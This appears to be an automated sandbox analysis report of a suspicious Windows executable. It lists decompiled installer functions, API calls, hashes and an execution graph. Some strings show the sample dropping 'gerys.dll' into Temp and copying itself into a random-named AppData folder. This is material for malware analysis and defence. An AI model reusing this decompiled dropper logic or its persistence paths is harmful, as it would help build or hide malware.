                          • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E00401EC5(char __ebx, char* __edi, char* __esi) {
                          				char* _t18;
                          				int _t19;
                          				void* _t30;
                          
                          				_t18 = E004029E8(0xffffffee);
                          				 *(_t30 - 0x2c) = _t18;
                          				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                          				 *__esi = __ebx;
                          				 *(_t30 - 8) = _t19;
                          				 *__edi = __ebx;
                          				 *((intOrPtr*)(_t30 - 4)) = 1;
                          				if(_t19 != __ebx) {
                          					__eax = GlobalAlloc(0x40, __eax);
                          					 *(__ebp + 8) = __eax;
                          					if(__eax != __ebx) {
                          						if(__eax != 0) {
                          							__ebp - 0x44 = __ebp - 0x34;
                          							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                          								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                          								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                          								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                          							}
                          						}
                          						_push( *(__ebp + 8));
                          						GlobalFree();
                          					}
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                          				return 0;
                          			}






                          0x00401ec7
                          0x00401ecf
                          0x00401ed4
                          0x00401ed9
                          0x00401edd
                          0x00401ee0
                          0x00401ee2
                          0x00401ee9
                          0x00401ef2
                          0x00401efa
                          0x00401efd
                          0x00401f12
                          0x00401f18
                          0x00401f2b
                          0x00401f34
                          0x00401f40
                          0x00401f45
                          0x00401f45
                          0x00401f2b
                          0x00401f48
                          0x00401b75
                          0x00401b75
                          0x00401efd
                          0x00402880
                          0x0040288c

                          APIs
                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                          • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                            • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 1404258612-0
                          • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                          • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                          • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                          • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E00401D1B() {
                          				void* __esi;
                          				int _t6;
                          				signed char _t11;
                          				struct HFONT__* _t14;
                          				void* _t18;
                          				void* _t24;
                          				void* _t26;
                          				void* _t28;
                          
                          				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                          				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                          				 *0x40af7c = E004029CB(3);
                          				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                          				 *0x40af83 = 1;
                          				 *0x40af80 = _t11 & 0x00000001;
                          				 *0x40af81 = _t11 & 0x00000002;
                          				 *0x40af82 = _t11 & 0x00000004;
                          				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                          				_t14 = CreateFontIndirectA(0x40af6c);
                          				_push(_t14);
                          				_push(_t26);
                          				E004059E3();
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                          				return 0;
                          			}











                          0x00401d29
                          0x00401d42
                          0x00401d4c
                          0x00401d51
                          0x00401d5c
                          0x00401d63
                          0x00401d75
                          0x00401d7b
                          0x00401d80
                          0x00401d8a
                          0x004024aa
                          0x00401561
                          0x00402825
                          0x00402880
                          0x0040288c

                          APIs
                          • GetDC.USER32(?), ref: 00401D22
                          • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                          • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirect
                          • String ID:
                          • API String ID: 3272661963-0
                          • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                          • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                          • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                          • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E00402012() {
                          				void* _t44;
                          				intOrPtr* _t48;
                          				intOrPtr* _t50;
                          				intOrPtr* _t52;
                          				intOrPtr* _t54;
                          				signed int _t58;
                          				intOrPtr* _t59;
                          				intOrPtr* _t62;
                          				intOrPtr* _t64;
                          				intOrPtr* _t66;
                          				intOrPtr* _t69;
                          				intOrPtr* _t71;
                          				int _t75;
                          				signed int _t81;
                          				intOrPtr* _t88;
                          				void* _t95;
                          				void* _t96;
                          				void* _t100;
                          
                          				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                          				_t96 = E004029E8(0xffffffdf);
                          				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                          				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                          				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                          				if(E004055E5(_t96) == 0) {
                          					E004029E8(0x21);
                          				}
                          				_t44 = _t100 + 8;
                          				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                          				if(_t44 < _t75) {
                          					L13:
                          					 *((intOrPtr*)(_t100 - 4)) = 1;
                          					_push(0xfffffff0);
                          				} else {
                          					_t48 =  *((intOrPtr*)(_t100 + 8));
                          					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                          					if(_t95 >= _t75) {
                          						_t52 =  *((intOrPtr*)(_t100 + 8));
                          						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                          						_t54 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                          						_t81 =  *(_t100 - 0x14);
                          						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                          						if(_t58 != 0) {
                          							_t88 =  *((intOrPtr*)(_t100 + 8));
                          							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                          							_t81 =  *(_t100 - 0x14);
                          						}
                          						_t59 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                          						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                          							_t71 =  *((intOrPtr*)(_t100 + 8));
                          							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                          						}
                          						_t62 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                          						_t64 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                          						if(_t95 >= _t75) {
                          							_t95 = 0x80004005;
                          							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                          								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                          								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                          							}
                          						}
                          						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                          						 *((intOrPtr*)( *_t66 + 8))(_t66);
                          					}
                          					_t50 =  *((intOrPtr*)(_t100 + 8));
                          					 *((intOrPtr*)( *_t50 + 8))(_t50);
                          					if(_t95 >= _t75) {
                          						_push(0xfffffff4);
                          					} else {
                          						goto L13;
                          					}
                          				}
                          				E00401423();
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                          				return 0;
                          			}





















                          0x0040201b
                          0x00402025
                          0x0040202e
                          0x00402038
                          0x00402041
                          0x0040204b
                          0x0040204f
                          0x0040204f
                          0x00402054
                          0x00402065
                          0x0040206d
                          0x0040214d
                          0x0040214d
                          0x00402154
                          0x00402073
                          0x00402073
                          0x00402084
                          0x00402088
                          0x0040208e
                          0x00402098
                          0x0040209a
                          0x004020a5
                          0x004020a8
                          0x004020b5
                          0x004020b7
                          0x004020b9
                          0x004020c0
                          0x004020c3
                          0x004020c3
                          0x004020c6
                          0x004020d0
                          0x004020d8
                          0x004020dd
                          0x004020e9
                          0x004020e9
                          0x004020ec
                          0x004020f5
                          0x004020f8
                          0x00402101
                          0x00402106
                          0x00402118
                          0x00402127
                          0x00402129
                          0x00402135
                          0x00402135
                          0x00402127
                          0x00402137
                          0x0040213d
                          0x0040213d
                          0x00402140
                          0x00402146
                          0x0040214b
                          0x00402160
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040214b
                          0x00402156
                          0x00402880
                          0x0040288c

                          APIs
                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 123533781-47812868
                          • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                          • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                          • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                          • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                          				long _t22;
                          
                          				if(_a8 != 0x102) {
                          					if(_a8 != 0x200) {
                          						_t22 = _a16;
                          						L7:
                          						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                          							 *0x420480 = _t22;
                          							E00405A85(0x420498, 0x424000);
                          							E004059E3(0x424000, _t22);
                          							E0040140B(6);
                          							E00405A85(0x424000, 0x420498);
                          						}
                          						L11:
                          						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                          					}
                          					if(IsWindowVisible(_a4) == 0) {
                          						L10:
                          						_t22 = _a16;
                          						goto L11;
                          					}
                          					_t22 = E004046F2(_a4, 1);
                          					_a8 = 0x419;
                          					goto L7;
                          				}
                          				if(_a12 != 0x20) {
                          					goto L10;
                          				}
                          				E00403E83(0x413);
                          				return 0;
                          			}




                          0x00404d7f
                          0x00404da4
                          0x00404dc4
                          0x00404dc7
                          0x00404dca
                          0x00404de1
                          0x00404de7
                          0x00404dee
                          0x00404df5
                          0x00404dfc
                          0x00404e01
                          0x00404e07
                          0x00000000
                          0x00404e17
                          0x00404db1
                          0x00404e04
                          0x00404e04
                          0x00000000
                          0x00404e04
                          0x00404dbd
                          0x00404dbf
                          0x00000000
                          0x00404dbf
                          0x00404d85
                          0x00000000
                          0x00000000
                          0x00404d8c
                          0x00000000

                          APIs
                          • IsWindowVisible.USER32(?), ref: 00404DA9
                          • CallWindowProcA.USER32 ref: 00404E17
                            • Part of subcall function 00403E83: SendMessageA.USER32 ref: 00403E95
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                          • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                          • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                          • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                          				int _t5;
                          				long _t7;
                          				struct _OVERLAPPED* _t11;
                          				intOrPtr* _t15;
                          				void* _t17;
                          				int _t21;
                          
                          				_t15 = __esi;
                          				_t11 = __ebx;
                          				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                          					_t7 = lstrlenA(E004029E8(0x11));
                          				} else {
                          					E004029CB(1);
                          					 *0x409f68 = __al;
                          				}
                          				if( *_t15 == _t11) {
                          					L8:
                          					 *((intOrPtr*)(_t17 - 4)) = 1;
                          				} else {
                          					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll", _t7, _t17 + 8, _t11);
                          					_t21 = _t5;
                          					if(_t21 == 0) {
                          						goto L8;
                          					}
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                          				return 0;
                          			}









                          0x004024b0
                          0x004024b0
                          0x004024b3
                          0x004024ce
                          0x004024b5
                          0x004024b7
                          0x004024bc
                          0x004024c3
                          0x004024d5
                          0x0040264e
                          0x0040264e
                          0x004024db
                          0x004024ed
                          0x004015a6
                          0x004015a8
                          0x00000000
                          0x004015ae
                          0x004015a8
                          0x00402880
                          0x0040288c

                          APIs
                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll, xrefs: 004024BC, 004024E1
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: FileWritelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp\gerys.dll
                          • API String ID: 427699356-114422824
                          • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                          • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                          • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                          • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004055BF(char* _a4) {
                          				char* _t3;
                          				char* _t5;
                          
                          				_t5 = _a4;
                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                          				while( *_t3 != 0x5c) {
                          					_t3 = CharPrevA(_t5, _t3);
                          					if(_t3 > _t5) {
                          						continue;
                          					}
                          					break;
                          				}
                          				 *_t3 =  *_t3 & 0x00000000;
                          				return  &(_t3[1]);
                          			}





                          0x004055c0
                          0x004055ca
                          0x004055cc
                          0x004055d3
                          0x004055db
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004055db
                          0x004055dd
                          0x004055e2

                          APIs
                          • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming\sspgadrjncoy,00402CC7,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 004055C5
                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Roaming\sspgadrjncoy,00402CC7,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe,80000000,00000003), ref: 004055D3
                          Strings
                          • C:\Users\user\AppData\Roaming\sspgadrjncoy, xrefs: 004055BF
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\AppData\Roaming\sspgadrjncoy
                          • API String ID: 2709904686-2266446683
                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                          • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004056D1(CHAR* _a4, CHAR* _a8) {
                          				int _t10;
                          				int _t15;
                          				CHAR* _t16;
                          
                          				_t15 = lstrlenA(_a8);
                          				_t16 = _a4;
                          				while(lstrlenA(_t16) >= _t15) {
                          					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                          					_t10 = lstrcmpiA(_t16, _a8);
                          					if(_t10 == 0) {
                          						return _t16;
                          					}
                          					_t16 = CharNextA(_t16);
                          				}
                          				return 0;
                          			}






                          0x004056dd
                          0x004056df
                          0x00405707
                          0x004056ec
                          0x004056f1
                          0x004056fc
                          0x00000000
                          0x00405719
                          0x00405705
                          0x00405705
                          0x00000000

                          APIs
                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                          • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                          • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                          • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:12.7%
                          Dynamic/Decrypted Code Coverage:3.6%
                          Signature Coverage:0%
                          Total number of Nodes:1564
                          Total number of Limit Nodes:15
                          execution_graph 11484 401640 11485 401656 _com_error::_com_error 11484->11485 11504 402233 11485->11504 11487 401664 _com_raise_error 11507 40372d 11487->11507 11489 401678 _com_raise_error 11514 4019be 11489->11514 11491 401701 11492 401c88 ___scrt_fastfail 4 API calls 11491->11492 11494 401708 ___scrt_initialize_default_local_stdio_options 11492->11494 11493 40168d __RTC_Initialize 11493->11491 11519 401b5f 11493->11519 11496 4016a6 _com_raise_error 11496->11491 11497 4016b7 11496->11497 11522 401c1a InitializeSListHead 11497->11522 11499 4016bc _com_raise_error __except_handler4 11523 401c26 11499->11523 11501 4016df _com_raise_error 11529 4037c7 11501->11529 11503 4016ea _com_raise_error 11506 402253 11504->11506 11505 402285 RaiseException 11505->11487 11506->11505 11508 40375f 11507->11508 11509 40373c 11507->11509 11508->11489 11509->11508 11510 404831 __dosmaperr 20 API calls 11509->11510 11511 40374f 11510->11511 11512 404639 _com_raise_error 26 API calls 11511->11512 11513 40375a 11512->11513 11513->11489 11515 4019cc 11514->11515 11518 4019d1 ___scrt_initialize_onexit_tables 11514->11518 11516 401c88 ___scrt_fastfail 4 API calls 11515->11516 11515->11518 11517 401a54 11516->11517 11518->11493 11536 401b24 11519->11536 11522->11499 11602 403d63 11523->11602 11525 401c37 11526 401c3e 11525->11526 11527 401c88 ___scrt_fastfail 4 API calls 11525->11527 11526->11501 11528 401c46 11527->11528 11530 404320 _com_raise_error 38 API calls 11529->11530 11531 4037d2 11530->11531 11532 404831 __dosmaperr 20 API calls 11531->11532 11535 40380a 11531->11535 11533 4037ff 11532->11533 11534 404639 _com_raise_error 26 API calls 11533->11534 11534->11535 11535->11503 11537 401b41 11536->11537 11538 401b48 11536->11538 11542 403bb7 11537->11542 11545 403c27 11538->11545 11541 401b46 11541->11496 11543 403c27 __onexit 29 API calls 11542->11543 11544 403bc9 11543->11544 11544->11541 11548 40392e 11545->11548 11551 403864 11548->11551 11550 403952 11550->11541 11552 403870 ___scrt_is_nonwritable_in_current_image 11551->11552 11559 405656 EnterCriticalSection 11552->11559 11554 40387e 11560 403a76 11554->11560 11556 40388b 11570 4038a9 11556->11570 11558 40389c ___scrt_is_nonwritable_in_current_image 11558->11550 11559->11554 11561 403a94 11560->11561 11568 403a8c _com_raise_error __crt_fast_encode_pointer 11560->11568 11562 403aed 11561->11562 11561->11568 11573 406786 11561->11573 11564 406786 __onexit 29 API calls 11562->11564 11562->11568 11566 403b03 11564->11566 11565 403ae3 11567 403e03 ___vcrt_freefls@4 20 API calls 11565->11567 11569 403e03 ___vcrt_freefls@4 20 API calls 11566->11569 11567->11562 11568->11556 11569->11568 11601 40569e LeaveCriticalSection 11570->11601 11572 4038b3 11572->11558 11574 406791 11573->11574 11575 4067b9 11574->11575 11576 4067aa 11574->11576 11577 4067c8 11575->11577 11582 407c1f 11575->11582 11578 404831 __dosmaperr 20 API calls 11576->11578 11589 407c52 11577->11589 11581 4067af ___scrt_get_show_window_mode 11578->11581 11581->11565 11583 407c2a 11582->11583 11584 407c3f HeapSize 11582->11584 11585 404831 __dosmaperr 20 API calls 11583->11585 11584->11577 11586 407c2f 11585->11586 11587 404639 _com_raise_error 26 API calls 11586->11587 11588 407c3a 11587->11588 11588->11577 11590 407c6a 11589->11590 11591 407c5f 11589->11591 11593 407c72 11590->11593 11599 407c7b __dosmaperr 11590->11599 11592 403e3d __onexit 21 API calls 11591->11592 11597 407c67 11592->11597 11594 403e03 ___vcrt_freefls@4 20 API calls 11593->11594 11594->11597 11595 407c80 11598 404831 __dosmaperr 20 API calls 11595->11598 11596 407ca5 HeapReAlloc 11596->11597 11596->11599 11597->11581 11598->11597 11599->11595 11599->11596 11600 4068fd __dosmaperr 7 API calls 11599->11600 11600->11599 11601->11572 11603 403d81 _com_raise_error 11602->11603 11607 403da1 _com_raise_error 11602->11607 11604 404831 __dosmaperr 20 API calls 11603->11604 11605 403d97 11604->11605 11606 404639 _com_raise_error 26 API calls 11605->11606 11606->11607 11607->11525 12095 4078c0 12098 405243 12095->12098 12099 40524c 12098->12099 12100 405255 12098->12100 12101 405142 51 API calls 12099->12101 12101->12100 11608 405244 11610 405255 11608->11610 11611 405142 11608->11611 11612 404320 _com_raise_error 38 API calls 11611->11612 11613 40514f 11612->11613 11631 405261 11613->11631 11615 405157 11640 404ed6 11615->11640 11618 40516e 11618->11610 11619 403e3d __onexit 21 API calls 11620 40517f 11619->11620 11621 4051b1 11620->11621 11647 405303 11620->11647 